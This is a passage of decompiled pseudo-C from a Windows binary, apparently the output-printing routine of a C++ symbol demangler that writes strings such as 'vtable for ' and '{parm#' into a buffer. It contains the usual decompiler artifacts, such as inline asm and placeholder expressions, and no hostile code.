				_t1829 =  *((intOrPtr*)(_t1446 + 0x118));
				 *((char*)(_t1446 + 0xff)) = 0;
				_t1490 = _t1446;
				 *((intOrPtr*)(_t1446 + 0x110))();
				 *((intOrPtr*)(_t1446 + 0x140)) =  *((intOrPtr*)(_t1446 + 0x140)) + 1;
				if ( *((intOrPtr*)(_t1829 + 0x10)) == 0) goto 0x7eec953c;
				E00007FF67FF67EECAF30(_t1490,  *((intOrPtr*)(_t1829 + 0x10)));
				_t1372 =  *((intOrPtr*)(_t1446 + 0x100));
				if (_t1372 == 0xff) goto 0x7eeca708;
				 *((long long*)(_t1446 + 0x100)) = _t1372 + 1;
				_t1491 = _t1446;
				 *((char*)(_t1446 + _t1372)) = 0x7b;
				 *((char*)(_t1446 + 0x108)) = 0x7b;
				E00007FF67FF67EECAF30(_t1491,  *((intOrPtr*)(_t1735 + 0x18)));
				_t1373 =  *((intOrPtr*)(_t1446 + 0x100));
				if (_t1373 == 0xff) goto 0x7eeca6d9;
				 *((long long*)(_t1446 + 0x100)) = _t1373 + 1;
				 *((char*)(_t1446 + _t1373)) = 0x7d;
				 *((char*)(_t1446 + 0x108)) = 0x7d;
				_t1374 =  *((intOrPtr*)(_t1491 + 0x100));
				goto 0x7eec95e6;
				asm("o16 nop [eax+eax]");
				_t1375 = _t1374 + 1;
				 *((long long*)(_t1446 + 0x100)) = _t1375;
				 *((intOrPtr*)(_t1446 + _t1374)) = bpl;
				 *((intOrPtr*)(_t1446 + 0x108)) = bpl;
				if ("operator " + 9 == "operator " + 1) goto 0x7eec80b0;
				if (_t1375 != 0xff) goto 0x7eec95c0;
				 *((char*)(_t1446 + 0xff)) = 0;
				_t1492 = _t1446;
				 *((intOrPtr*)(_t1446 + 0x110))();
				 *((intOrPtr*)(_t1446 + 0x140)) =  *((intOrPtr*)(_t1446 + 0x140)) + 1;
				_t1376 =  *((intOrPtr*)(_t1492 + 0x100));
				goto 0x7eec965e;
				_t1377 = _t1376 + 1;
				 *((long long*)(_t1446 + 0x100)) = _t1377;
				 *((intOrPtr*)(_t1446 + _t1376)) = bpl;
				 *((intOrPtr*)(_t1446 + 0x108)) = bpl;
				if ("VTT for " + 1 == "VTT for " + 8) goto 0x7eec7e88;
				if (_t1377 != 0xff) goto 0x7eec9638;
				 *((char*)(_t1446 + 0xff)) = 0;
				_t1493 = _t1446;
				 *((intOrPtr*)(_t1446 + 0x110))();
				 *((intOrPtr*)(_t1446 + 0x140)) =  *((intOrPtr*)(_t1446 + 0x140)) + 1;
				_t1378 =  *((intOrPtr*)(_t1493 + 0x100));
				goto 0x7eec96d6;
				_t1379 = _t1378 + 1;
				 *((long long*)(_t1446 + 0x100)) = _t1379;
				 *((intOrPtr*)(_t1446 + _t1378)) = bpl;
				 *((intOrPtr*)(_t1446 + 0x108)) = bpl;
				if ("vtable for " + 0xb == "vtable for " + 1) goto 0x7eec7e88;
				if (_t1379 != 0xff) goto 0x7eec96b0;
				 *((char*)(_t1446 + 0xff)) = 0;
				_t1494 = _t1446;
				 *((intOrPtr*)(_t1446 + 0x110))();
				 *((intOrPtr*)(_t1446 + 0x140)) =  *((intOrPtr*)(_t1446 + 0x140)) + 1;
				_t1380 =  *((intOrPtr*)(_t1494 + 0x100));
				goto 0x7eec974e;
				_t1381 = _t1380 + 1;
				 *((long long*)(_t1446 + 0x100)) = _t1381;
				 *((intOrPtr*)(_t1446 + _t1380)) = bpl;
				 *((intOrPtr*)(_t1446 + 0x108)) = bpl;
				if ("typeinfo fn for " + 0x10 == "typeinfo fn for " + 1) goto 0x7eec7e88;
				if (_t1381 != 0xff) goto 0x7eec9728;
				 *((char*)(_t1446 + 0xff)) = 0;
				_t1495 = _t1446;
				 *((intOrPtr*)(_t1446 + 0x110))();
				 *((intOrPtr*)(_t1446 + 0x140)) =  *((intOrPtr*)(_t1446 + 0x140)) + 1;
				_t1382 =  *((intOrPtr*)(_t1495 + 0x100));
				goto 0x7eec97c6;
				_t1383 = _t1382 + 1;
				 *((long long*)(_t1446 + 0x100)) = _t1383;
				 *((intOrPtr*)(_t1446 + _t1382)) = bpl;
				 *((intOrPtr*)(_t1446 + 0x108)) = bpl;
				if ("typeinfo name for " + 0x12 == "typeinfo name for " + 1) goto 0x7eec7e88;
				if (_t1383 != 0xff) goto 0x7eec97a0;
				 *((char*)(_t1446 + 0xff)) = 0;
				_t1496 = _t1446;
				 *((intOrPtr*)(_t1446 + 0x110))();
				 *((intOrPtr*)(_t1446 + 0x140)) =  *((intOrPtr*)(_t1446 + 0x140)) + 1;
				goto 0x7eec97a7;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t1446 + 0x118)) + 0x10)) == 0) goto 0x7eec9878;
				asm("dec cx");
				asm("dec ax");
				 *((intOrPtr*)(_t1786 + 0x40)) = 0;
				 *((long long*)(_t1496 + 0x128)) = _t1786 + 0x30;
				asm("punpcklqdq xmm0, xmm4");
				asm("movaps [esp+0x30], xmm0");
				 *((long long*)(_t1786 + 0x48)) =  *((intOrPtr*)(_t1496 + 0x120));
				_t791 = E00007FF67FF67EECAF30(_t1496,  *((intOrPtr*)( *((intOrPtr*)(_t1446 + 0x118)) + 0x10)));
				r14d =  *((intOrPtr*)(_t1786 + 0x40));
				 *((long long*)(_t1446 + 0x128)) =  *((intOrPtr*)(_t1786 + 0x30));
				if (r14d != 0) goto 0x7eec7e2a;
				E00007FF67FF67EEC4760(_t791, 0x20, _t1446);
				_t1498 = _t1446;
				_t1787 = _t1786 + 0xb8;
				_pop(_t1447);
				_pop(_t1737);
				_t1387 =  *((intOrPtr*)(_t1498 + 0x100));
				if (_t1387 == 0xff) goto 0x7eeca6ad;
				_t1611 = _t1387 + 1;
				 *(_t1447 + 0x100) = _t1611;
				 *((char*)(_t1447 + _t1387)) = 0x7e;
				 *((char*)(_t1447 + 0x108)) = 0x7e;
				_t1766 = _t1787 + 0x30;
				asm("dec cx");
				_t1936 =  *((intOrPtr*)(_t1498 + 0x128));
				 *((intOrPtr*)(_t1787 + 0x40)) = 0;
				 *((long long*)(_t1498 + 0x128)) = _t1766;
				asm("dec cx");
				 *((long long*)(_t1787 + 0x48)) =  *((intOrPtr*)(_t1498 + 0x120));
				asm("punpcklqdq xmm0, xmm3");
				_t1389 = _t1936;
				asm("movaps [esp+0x30], xmm0");
				if (_t1936 != 0) goto 0x7eec9980;
				goto 0x7eeca003;
				r13d =  *((intOrPtr*)(_t1389 + 0x10));
				if (r13d != 0) goto 0x7eec9978;
				if (1 - 3 > 0) goto 0x7eec7e20;
				_t1612 = _t1611 << 5;
				_t1499 = _t1787 + _t1612 + 0x30;
				 *((long long*)(_t1787 + _t1612 + 0x30)) =  *_t1389;
				 *((long long*)(_t1499 + 8)) =  *((intOrPtr*)(_t1389 + 8));
				 *((long long*)(_t1499 + 0x10)) =  *((intOrPtr*)(_t1389 + 0x10));
				 *((long long*)(_t1499 + 0x18)) =  *((intOrPtr*)(_t1389 + 0x18));
				 *((long long*)(_t1787 + _t1612 + 0x30)) = _t1766;
				_t1898 = _t1766 + _t1612;
				 *(_t1447 + 0x128) = _t1766 + _t1612;
				 *((intOrPtr*)(_t1389 + 0x10)) = 1;
				_t1390 =  *_t1389;
				if (_t1390 == 0) goto 0x7eec998e;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t1390 + 8)))) - 0x19 - 2 <= 0) goto 0x7eec9920;
				E00007FF67FF67EECAF30(_t1447,  *((intOrPtr*)(_t1737 + 0x18)));
				r11d =  *((intOrPtr*)(_t1787 + 0x40));
				 *(_t1447 + 0x128) = _t1936;
				if (r11d != 0) goto 0x7eec7e2a;
				if (1 == 1) goto 0x7eeca025;
				asm("o16 nop [eax+eax]");
				_t1845 =  *((intOrPtr*)(_t1766 + (_t1390 << 5) + 8));
				_t1501 = _t1447;
				E00007FF67FF67EECAFD0();
				if (1 == 1) goto 0x7eeca025;
				_t1769 =  *((intOrPtr*)(_t1845 + 0x18));
				if (_t1769 == 0) goto 0x7eec7e2a;
				_t1392 =  *((intOrPtr*)(_t1501 + 0x100));
				goto 0x7eec9a36;
				_t1393 = _t1392 + 1;
				 *(_t1447 + 0x100) = _t1393;
				 *((intOrPtr*)(_t1447 + _t1392)) = dil;
				 *((intOrPtr*)(_t1447 + 0x108)) = dil;
				if (_t1769 +  *((intOrPtr*)(_t1845 + 0x10)) ==  *((intOrPtr*)(_t1845 + 0x10)) + 1) goto 0x7eec7e2a;
				if (_t1393 != 0xff) goto 0x7eec9a10;
				_t1846 =  *((intOrPtr*)(_t1447 + 0x118));
				 *((char*)(_t1447 + 0xff)) = 0;
				_t1502 = _t1447;
				 *((intOrPtr*)(_t1447 + 0x110))();
				 *((intOrPtr*)(_t1447 + 0x140)) =  *((intOrPtr*)(_t1447 + 0x140)) + 1;
				_t1394 =  *((intOrPtr*)(_t1846 + 0x10));
				_t1771 =  *((intOrPtr*)(_t1394 + 8));
				_t1740 =  *_t1394;
				if (_t1771 == 0) goto 0x7eec7e2a;
				_t1395 =  *((intOrPtr*)(_t1502 + 0x100));
				_t1772 = _t1771 + _t1740;
				goto 0x7eec9ab6;
				_t1396 = _t1395 + 1;
				 *(_t1447 + 0x100) = _t1396;
				 *((intOrPtr*)(_t1447 + _t1395)) = dil;
				 *((intOrPtr*)(_t1447 + 0x108)) = dil;
				if (_t1740 + 1 == _t1772) goto 0x7eec7e2a;
				if (_t1396 != 0xff) goto 0x7eec9a90;
				 *((char*)(_t1447 + 0xff)) = 0;
				 *((intOrPtr*)(_t1447 + 0x110))();
				 *((intOrPtr*)(_t1447 + 0x140)) =  *((intOrPtr*)(_t1447 + 0x140)) + 1;
				goto 0x7eec9a97;
				_t1504 = _t1447;
				E00007FF67FF67EECAF30(_t1504,  *((intOrPtr*)(_t1740 + 0x19)));
				_t1397 =  *(_t1447 + 0x100);
				if (_t1397 == 0xff) goto 0x7eeca2b3;
				 *(_t1447 + 0x100) = _t1397 + 1;
				 *((char*)(_t1447 + _t1397)) = 0x5d;
				 *((char*)(_t1447 + 0x108)) = 0x5d;
				goto 0x7eec7e2a;
				asm("dec cx");
				asm("dec ax");
				 *(_t1447 + 0x128) = _t1787 + 0x30;
				asm("punpcklqdq xmm0, xmm1");
				 *((intOrPtr*)(_t1787 + 0x40)) = 0;
				asm("movaps [esp+0x30], xmm0");
				 *((long long*)(_t1787 + 0x48)) =  *((intOrPtr*)(_t1447 + 0x120));
				if ( *((intOrPtr*)(_t1504 + 0x10)) != 0) goto 0x7eec7ef0;
				goto 0x7eec7ee8;
				E00007FF67FF67EECAF30(_t1447,  *((intOrPtr*)(_t1740 + 0x19)));
				_t1400 =  *(_t1447 + 0x100);
				goto 0x7eec9bc6;
				_t1401 = _t1400 + 1;
				 *(_t1447 + 0x100) = _t1401;
				 *((intOrPtr*)(_t1447 + _t1400)) = bpl;
				 *((intOrPtr*)(_t1447 + 0x108)) = bpl;
				if (" for " + 1 == " for " + 5) goto 0x7eec7e88;
				if (_t1401 != 0xff) goto 0x7eec9ba0;
				 *((char*)(_t1447 + 0xff)) = 0;
				 *((intOrPtr*)(_t1447 + 0x110))();
				 *((intOrPtr*)(_t1447 + 0x140)) =  *((intOrPtr*)(_t1447 + 0x140)) + 1;
				goto 0x7eec9ba7;
				_t1717 = "-in-";
				_t1938 = _t1717 + 4;
				E00007FF67FF67EECAF30(_t1447,  *((intOrPtr*)(_t1740 + 0x11)));
				_t1402 =  *(_t1447 + 0x100);
				goto 0x7eec9c4e;
				asm("o16 nop [eax+eax]");
				_t1403 = _t1402 + 1;
				 *(_t1447 + 0x100) = _t1403;
				 *((intOrPtr*)(_t1447 + _t1402)) = bpl;
				 *((intOrPtr*)(_t1447 + 0x108)) = bpl;
				if (_t1938 == _t1717 + 1) goto 0x7eec80b0;
				if (_t1403 != 0xff) goto 0x7eec9c28;
				 *((char*)(_t1447 + 0xff)) = 0;
				 *((intOrPtr*)(_t1447 + 0x110))();
				 *((intOrPtr*)(_t1447 + 0x140)) =  *((intOrPtr*)(_t1447 + 0x140)) + 1;
				goto 0x7eec9c2f;
				goto 0x7eec9338;
				_t1742 =  *((intOrPtr*)(_t1938 + 8));
				if (_t1447 - 0x61 - 0x19 <= 0) goto 0x7eeca4b6;
				_t1773 =  ==  ? _t1772 - 1 : _t1772;
				if (_t1773 == 0) goto 0x7eec7e2a;
				_t1405 =  *(_t1447 + 0x100);
				goto 0x7eec9cee;
				_t1406 = _t1405 + 1;
				_t1743 = _t1742 + 1;
				 *(_t1447 + 0x100) = _t1406;
				 *((intOrPtr*)(_t1447 + _t1405)) = dil;
				 *((intOrPtr*)(_t1447 + 0x108)) = dil;
				if (_t1773 + _t1742 == _t1743) goto 0x7eec7e2a;
				if (_t1406 != 0xff) goto 0x7eec9cc8;
				 *((char*)(_t1447 + 0xff)) = 0;
				 *((intOrPtr*)(_t1447 + 0x110))();
				 *((intOrPtr*)(_t1447 + 0x140)) =  *((intOrPtr*)(_t1447 + 0x140)) + 1;
				goto 0x7eec9ccf;
				if ( *((intOrPtr*)(_t1447 + 0x170)) == 0) goto 0x7eec9d53;
				asm("movq xmm0, [ebx+0x120]");
				asm("dec ax");
				asm("punpcklqdq xmm0, xmm5");
				 *((long long*)(_t1447 + 0x120)) = _t1787 + 0x30;
				asm("movaps [esp+0x30], xmm0");
				if ( *((intOrPtr*)( *((intOrPtr*)(_t1743 + 0x10)))) == 4) goto 0x7eeca319;
				E00007FF67FF67EECAF30(_t1447,  *((intOrPtr*)(_t1743 + 0x10)));
				if ( *((long long*)(_t1447 + 0x170)) == 0) goto 0x7eec7e2a;
				 *((long long*)(_t1447 + 0x120)) =  *((intOrPtr*)(_t1787 + 0x30));
				goto 0x7eec7e2a;
				 *((intOrPtr*)(_t1447 + 0x138)) =  *((intOrPtr*)(_t1447 + 0x138)) + 1;
				_t1719 = ")#";
				_t1939 = _t1719 + 2;
				E00007FF67FF67EECAF30(_t1447,  *((intOrPtr*)(_t1743 + 0x10)));
				_t1410 =  *(_t1447 + 0x100);
				 *((intOrPtr*)(_t1447 + 0x138)) =  *((intOrPtr*)(_t1447 + 0x138)) - 1;
				goto 0x7eec9de2;
				_t1411 = _t1410 + 1;
				_t1720 = _t1719 + 1;
				 *(_t1447 + 0x100) = _t1411;
				 *((intOrPtr*)(_t1447 + _t1410)) = bpl;
				 *((intOrPtr*)(_t1447 + 0x108)) = bpl;
				if (_t1939 == _t1720) goto 0x7eec9e19;
				if (_t1411 != 0xff) goto 0x7eec9dc0;
				 *((char*)(_t1447 + 0xff)) = 0;
				 *((intOrPtr*)(_t1447 + 0x110))();
				 *((intOrPtr*)(_t1447 + 0x140)) =  *((intOrPtr*)(_t1447 + 0x140)) + 1;
				goto 0x7eec9dc7;
				r8d = _t1411 + 1;
				E00007FF67FF67EEC46E0( *((intOrPtr*)(_t1447 + 0x118)), _t1898);
				strlen(??);
				_t1622 =  *(_t1447 + 0x100);
				if (_t1411 == 0) goto 0x7eec9eb0;
				goto 0x7eec9e72;
				_t1623 = _t1622 + 1;
				 *(_t1447 + 0x100) = _t1623;
				 *((intOrPtr*)(_t1447 + _t1622)) = dil;
				 *((intOrPtr*)(_t1447 + 0x108)) = dil;
				if (_t1787 + 0x30 + _t1411 == _t1787 + 0x31) goto 0x7eec9eb0;
				if (_t1623 != 0xff) goto 0x7eec9e50;
				 *((char*)(_t1447 + 0xff)) = 0;
				 *((intOrPtr*)(_t1447 + 0x110))();
				 *((intOrPtr*)(_t1447 + 0x140)) =  *((intOrPtr*)(_t1447 + 0x140)) + 1;
				goto 0x7eec9e57;
				asm("o16 nop [eax+eax]");
				if (_t1623 == 0xff) goto 0x7eeca284;
				_t1413 = _t1623 + 1;
				 *(_t1447 + 0x100) = _t1413;
				 *((char*)(_t1447 + _t1623)) = 0x7d;
				 *((char*)(_t1447 + 0x108)) = 0x7d;
				goto 0x7eec7e2a;
				_t1746 = _t1787 + 0x30;
				r8d = _t1413 + 1;
				E00007FF67FF67EEC46E0( *((intOrPtr*)(_t1447 + 0x118)), _t1898);
				strlen(??);
				_t1625 =  *(_t1447 + 0x100);
				if (_t1413 == 0) goto 0x7eec9eb0;
				goto 0x7eec9f36;
				_t1626 = _t1625 + 1;
				_t1747 = _t1746 + 1;
				 *(_t1447 + 0x100) = _t1626;
				 *((intOrPtr*)(_t1447 + _t1625)) = dil;
				 *((intOrPtr*)(_t1447 + 0x108)) = dil;
				if (_t1747 == _t1746 + _t1413) goto 0x7eec9eb0;
				_t1070 =  *_t1747 & 0x000000ff;
				if (_t1626 != 0xff) goto 0x7eec9f10;
				 *((char*)(_t1447 + 0xff)) = 0;
				 *((intOrPtr*)(_t1447 + 0x110))();
				 *((intOrPtr*)(_t1447 + 0x140)) =  *((intOrPtr*)(_t1447 + 0x140)) + 1;
				goto 0x7eec9f17;
				E00007FF67FF67EECAFD0();
				goto 0x7eec7f0b;
				_t1520 = _t1447;
				E00007FF67FF67EECAF30(_t1520, _t1747[0x18]);
				if ( *((intOrPtr*)(_t1447 + 0x140)) !=  *((intOrPtr*)(_t1447 + 0x140))) goto 0x7eec7e2a;
				if ( *(_t1447 + 0x100) != _t1720) goto 0x7eec7e2a;
				_t1721 = _t1720 - 2;
				 *(_t1447 + 0x100) = _t1721;
				goto 0x7eec7e2a;
				_t1722 =  *((intOrPtr*)(_t1721 + 0x10));
				if (_t1722 == 0) goto 0x7eecae75;
				if (r13d == 4) goto 0x7eec7e14;
				r9d = r13d;
				goto 0x7eec81d0;
				if (r10d != 0x2f) goto 0x7eec7fdb;
				_t1748 = _t1520;
				goto 0x7eec7fdb;
				E00007FF67FF67EECAF30(_t1520,  *((intOrPtr*)( *((intOrPtr*)(_t1520 + 0x10)) + 0x18)));
				 *(_t1447 + 0x128) = _t1626;
				if ( *((intOrPtr*)(_t1787 + 0x40)) != 0) goto 0x7eec7e2a;
				_t1521 = _t1447;
				E00007FF67FF67EECBF60(_t1521, _t1748,  *(_t1447 + 0x128));
				goto 0x7eec7e2a;
				 *(_t1447 + 0x128) = _t1939;
				goto 0x7eec7e2a;
				if (_t1070 != 7) goto 0x7eec803e;
				_t1416 =  *((intOrPtr*)(_t1748 + 0x18));
				if ( *_t1416 != 0) goto 0x7eec803e;
				if ( *((intOrPtr*)(_t1416 + 0x18)) != 1) goto 0x7eec803e;
				if (r10d != 0x3d) goto 0x7eec803e;
				_t1417 =  *((intOrPtr*)(_t1416 + 0x10));
				_t825 =  *_t1417 & 0x000000ff;
				if (_t825 == 0x30) goto 0x7eecaf19;
				if (_t825 != 0x31) goto 0x7eec803e;
				goto 0x7eec86a8;
				E00007FF67FF67EEC47D0(_t1521, _t1748);
				if (_t1417 == 0) goto 0x7eec7e20;
				if ( *_t1417 != 0x2f) goto 0x7eeca2ef;
				_t827 =  *((intOrPtr*)(_t1521 + 0x13c));
				if (_t827 < 0) goto 0x7eeca2ef;
				if (_t827 == 0) goto 0x7eeca2e2;
				_t1867 = _t1417[0x18];
				if (_t1867 == 0) goto 0x7eec7e20;
				if ( *_t1867 == 0x2f) goto 0x7eeca0d0;
				goto 0x7eec7e20;
				E00007FF67FF67EEC4830(_t1417, _t1521, "{parm#");
				r8d = _t1070;
				E00007FF67FF67EEC46E0(_t1867,  *(_t1447 + 0x128));
				strlen(??);
				_t1631 =  *(_t1447 + 0x100);
				if (_t1417 == 0) goto 0x7eeca18a;
				goto 0x7eeca152;
				_t1632 = _t1631 + 1;
				 *(_t1447 + 0x100) = _t1632;
				 *((intOrPtr*)(_t1447 + _t1631)) = dil;
				 *((intOrPtr*)(_t1447 + 0x108)) = dil;
				if (_t1787 + 0x30 + _t1417 == _t1787 + 0x31) goto 0x7eeca18a;
				if (_t1632 != 0xff) goto 0x7eeca130;
				 *((char*)(_t1447 + 0xff)) = 0;
				 *((intOrPtr*)(_t1447 + 0x110))();
				 *((intOrPtr*)(_t1447 + 0x140)) =  *((intOrPtr*)(_t1447 + 0x140)) + 1;
				goto 0x7eeca137;
				if (_t1632 == 0xff) goto 0x7eecaafe;
				_t1419 = _t1632 + 1;
				 *(_t1447 + 0x100) = _t1419;
				 *((char*)(_t1447 + _t1632)) = 0x7d;
				 *((char*)(_t1447 + 0x108)) = 0x7d;
				goto 0x7eec7e2a;
				r8d = _t1419 + 1;
				E00007FF67FF67EEC46E0( *((intOrPtr*)(_t1447 + 0x118)),  *(_t1447 + 0x128));
				strlen(??);
				if (_t1419 == 0) goto 0x7eec7e2a;
				_t1634 =  *(_t1447 + 0x100);
				goto 0x7eeca216;
				_t1635 = _t1634 + 1;
				 *(_t1447 + 0x100) = _t1635;
				 *((intOrPtr*)(_t1447 + _t1634)) = dil;
				 *((intOrPtr*)(_t1447 + 0x108)) = dil;
				if (_t1787 + 0x30 + _t1419 == _t1787 + 0x31) goto 0x7eec7e2a;
				if (_t1635 != 0xff) goto 0x7eeca1f0;
				 *((char*)(_t1447 + 0xff)) = 0;
				 *((intOrPtr*)(_t1447 + 0x110))();
				 *((intOrPtr*)(_t1447 + 0x140)) =  *((intOrPtr*)(_t1447 + 0x140)) + 1;
				goto 0x7eeca1f7;
				goto 0x7eec803e;
				 *((char*)(_t1447 + 0xff)) = 0;
				 *((intOrPtr*)(_t1447 + 0x110))();
				 *((intOrPtr*)(_t1447 + 0x140)) =  *((intOrPtr*)(_t1447 + 0x140)) + 1;
				goto 0x7eec935c;
				 *((char*)(_t1447 + 0xff)) = 0;
				 *((intOrPtr*)(_t1447 + 0x110))();
				 *((intOrPtr*)(_t1447 + 0x140)) =  *((intOrPtr*)(_t1447 + 0x140)) + 1;
				goto 0x7eec9ec1;
				 *((char*)(_t1447 + 0xff)) = 0;
				 *((intOrPtr*)(_t1447 + 0x110))();
				 *((intOrPtr*)(_t1447 + 0x140)) =  *((intOrPtr*)(_t1447 + 0x140)) + 1;
				goto 0x7eec9b18;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t1447 + 0x118)) + 0x10)) == 0) goto 0x7eec7e20;
				_t1753 =  *((intOrPtr*)(_t1447 + 0x120));
				 *((long long*)(_t1447 + 0x120)) =  *_t1753;
				E00007FF67FF67EECAF30(_t1447,  *((intOrPtr*)( *((intOrPtr*)(_t1447 + 0x118)) + 0x10)));
				 *((long long*)(_t1447 + 0x120)) = _t1753;
				goto 0x7eec7e2a;
				E00007FF67FF67EECAF30(_t1447,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1447 + 0x118)) + 0x10)) + 0x10)));
				if ( *((long long*)(_t1447 + 0x170)) == 0) goto 0x7eeca340;
				 *((long long*)(_t1447 + 0x120)) =  *((intOrPtr*)(_t1787 + 0x30));
				if ( *((char*)(_t1447 + 0x108)) == 0x3c) goto 0x7eecac3b;
				_t1423 =  *(_t1447 + 0x100);
				if (_t1423 == 0xff) goto 0x7eecac11;
				 *(_t1447 + 0x100) = _t1423 + 1;
				 *((char*)(_t1447 + _t1423)) = 0x3c;
				 *((char*)(_t1447 + 0x108)) = 0x3c;
				E00007FF67FF67EECAF30(_t1447,  *((intOrPtr*)( *((intOrPtr*)(_t1753 + 0x10)) + 0x18)));
				if ( *((char*)(_t1447 + 0x108)) == 0x3e) goto 0x7eecabff;
				_t1425 =  *(_t1447 + 0x100);
				_t1270 = _t1425 - 0xff;
				if (_t1270 == 0) goto 0x7eecabd5;
				 *(_t1447 + 0x100) = _t1425 + 1;
				 *((char*)(_t1447 + _t1425)) = 0x3e;
				 *((char*)(_t1447 + 0x108)) = 0x3e;
				goto 0x7eec7e2a;
				_t1426 =  *((intOrPtr*)(_t1722 + 0x10));
				_t1779 =  *_t1426;
				if (_t1270 != 0) goto 0x7eeca3e5;
				if (_t1270 != 0) goto 0x7eeca3e5;
				_t895 =  *_t1753;
				if ((_t1779[2] & 0x000000ff) != 0) goto 0x7eeca3f4;
				if (_t895 == 3) goto 0x7eecad13;
				if (_t895 == 0x39) goto 0x7eecae33;
				if (( *_t1779 & 0x000000ff) != 0x73) goto 0x7eeca446;
				if (_t1779[1] != 0x5a) goto 0x7eecab4d;
				if (_t1779[2] != 0) goto 0x7eecab4d;
				E00007FF67FF67EEC48D0();
				E00007FF67FF67EEC45A0(_t1426);
				_pop(_t1448);
				_pop(_t1754);
				_pop(_t1723);
				_pop(_t1780);
				goto E00007FF67FF67EEC4A60;
				E00007FF67FF67EECC230(_t1448, _t1723);
				_t851 =  *_t1780 & 0x000000ff;
				if (_t851 != 0x67) goto 0x7eeca472;
				if (_t1780[1] != 0x73) goto 0x7eeca472;
				if (_t1780[2] == 0) goto 0x7eec7e8c;
				if (_t851 != 0x73) goto 0x7eec8d58;
				if (_t1780[1] != 0x74) goto 0x7eec8d58;
				if (_t1780[2] != 0) goto 0x7eec8d58;
				E00007FF67FF67EEC4760(_t851, 0x28, _t1448);
				E00007FF67FF67EECAF30(_t1448, _t1754);
				goto 0x7eec8d14;
				if (_t1426 == 0xff) goto 0x7eecac93;
				 *(_t1448 + 0x100) = _t1426 + 1;
				 *((char*)(_t1448 + _t1426)) = 0x20;
				 *((char*)(_t1448 + 0x108)) = 0x20;
				goto 0x7eec9ca2;
				E00007FF67FF67EEC4830(_t1426, _t1448, "_Sat ");
				goto 0x7eec8e99;
				E00007FF67FF67EECAFD0();
				goto 0x7eec7f82;
				_t1427 =  *(_t1448 + 0x100);
				if (_t1427 == 0xff) goto 0x7eecacec;
				 *(_t1448 + 0x100) = _t1427 + 1;
				 *((char*)(_t1448 + _t1427)) = 0x28;
				 *((char*)(_t1448 + 0x108)) = 0x28;
				E00007FF67FF67EECAF30(_t1448,  *((intOrPtr*)(_t1723 + 0x10)));
				_t1428 =  *(_t1448 + 0x100);
				if (_t1428 == 0xff) goto 0x7eecacc2;
				 *(_t1448 + 0x100) = _t1428 + 1;
				 *((char*)(_t1448 + _t1428)) = 0x29;
				 *((char*)(_t1448 + 0x108)) = 0x29;
				goto 0x7eec8d58;
				 *((char*)(_t1448 + _t1723)) = 0;
				 *((intOrPtr*)(_t1448 + 0x110))();
				 *(_t1448 + 0x100) = 0;
				 *((intOrPtr*)(_t1448 + 0x140)) =  *((intOrPtr*)(_t1448 + 0x140)) + 1;
				goto 0x7eec80f2;
				 *((char*)(_t1448 + 0xff)) = 0;
				 *((intOrPtr*)(_t1448 + 0x110))();
				 *((intOrPtr*)(_t1448 + 0x140)) =  *((intOrPtr*)(_t1448 + 0x140)) + 1;
				goto 0x7eec9322;
				E00007FF67FF67EEC4830(_t1428, _t1448, "{default arg#");
				_t1755 = _t1787 + 0xe8;
				r8d = _t1428 + 1;
				E00007FF67FF67EEC46E0( *((intOrPtr*)(_t1448 + 0x118)),  *(_t1447 + 0x128));
				strlen(??);
				if (_t1428 == 0) goto 0x7eeca669;
				_t1429 =  *(_t1448 + 0x100);
				goto 0x7eeca632;
				_t1430 = _t1429 + 1;
				_t1756 = _t1755 + 1;
				 *(_t1448 + 0x100) = _t1430;
				 *((intOrPtr*)(_t1448 + _t1429)) = dil;
				 *((intOrPtr*)(_t1448 + 0x108)) = dil;
				if (_t1428 + _t1755 == _t1756) goto 0x7eeca669;
				if (_t1430 != 0xff) goto 0x7eeca610;
				 *((char*)(_t1448 + 0xff)) = 0;
				 *((intOrPtr*)(_t1448 + 0x110))();
				 *((intOrPtr*)(_t1448 + 0x140)) =  *((intOrPtr*)(_t1448 + 0x140)) + 1;
				goto 0x7eeca617;
				_t1647 = "}::";
				_t1548 = _t1448;
				E00007FF67FF67EEC4830(_t1430, _t1548, _t1647);
				_t1781 = _t1780[0x10];
				goto 0x7eec818b;
				 *((char*)(_t1548 + 0xff)) = 0;
				 *((intOrPtr*)(_t1548 + 0x110))();
				 *((intOrPtr*)(_t1448 + 0x140)) =  *((intOrPtr*)(_t1448 + 0x140)) + 1;
				goto 0x7eec83f9;
				 *((char*)(_t1548 + 0xff)) = 0;
				 *((intOrPtr*)(_t1548 + 0x110))();
				 *((intOrPtr*)(_t1448 + 0x140)) =  *((intOrPtr*)(_t1448 + 0x140)) + 1;
				goto 0x7eec98b2;
				 *((char*)(_t1448 + 0xff)) = 0;
				 *((intOrPtr*)(_t1448 + 0x110))();
				 *((intOrPtr*)(_t1448 + 0x140)) =  *((intOrPtr*)(_t1448 + 0x140)) + 1;
				goto 0x7eec958c;
				 *((char*)(_t1448 + 0xff)) = 0;
				 *((intOrPtr*)(_t1448 + 0x110))();
				 *((intOrPtr*)(_t1448 + 0x140)) =  *((intOrPtr*)(_t1448 + 0x140)) + 1;
				goto 0x7eec9553;
				E00007FF67FF67EEC4760(0, 0x5b, _t1448);
				E00007FF67FF67EECAF30(_t1448, _t1756[0x18]);
				goto 0x7eec8d14;
				 *((char*)(_t1448 + 0xff)) = 0;
				 *((intOrPtr*)(_t1448 + 0x110))();
				 *((intOrPtr*)(_t1448 + 0x140)) =  *((intOrPtr*)(_t1448 + 0x140)) + 1;
				goto 0x7eec8f97;
				E00007FF67FF67EEC4760(0, 0x20, _t1448);
				goto 0x7eec8f80;
				 *((char*)(_t1448 + 0xff)) = 0;
				 *((intOrPtr*)(_t1448 + 0x110))();
				 *((intOrPtr*)(_t1448 + 0x140)) =  *((intOrPtr*)(_t1448 + 0x140)) + 1;
				goto 0x7eec8f50;
				_t881 = E00007FF67FF67EEC4760(0, 0x20, _t1448);
				goto 0x7eec8f39;
				E00007FF67FF67EEC4760(_t881, 0x2d, _t1448);
				goto 0x7eec80a6;
				 *((char*)(_t1448 + 0xff)) = 0;
				 *((intOrPtr*)(_t1448 + 0x110))();
				 *((intOrPtr*)(_t1448 + 0x140)) =  *((intOrPtr*)(_t1448 + 0x140)) + 1;
				goto 0x7eec808b;
				 *((char*)(_t1448 + 0xff)) = 0;
				 *((intOrPtr*)(_t1448 + 0x110))();
				_t1893 = _t1756[0x10];
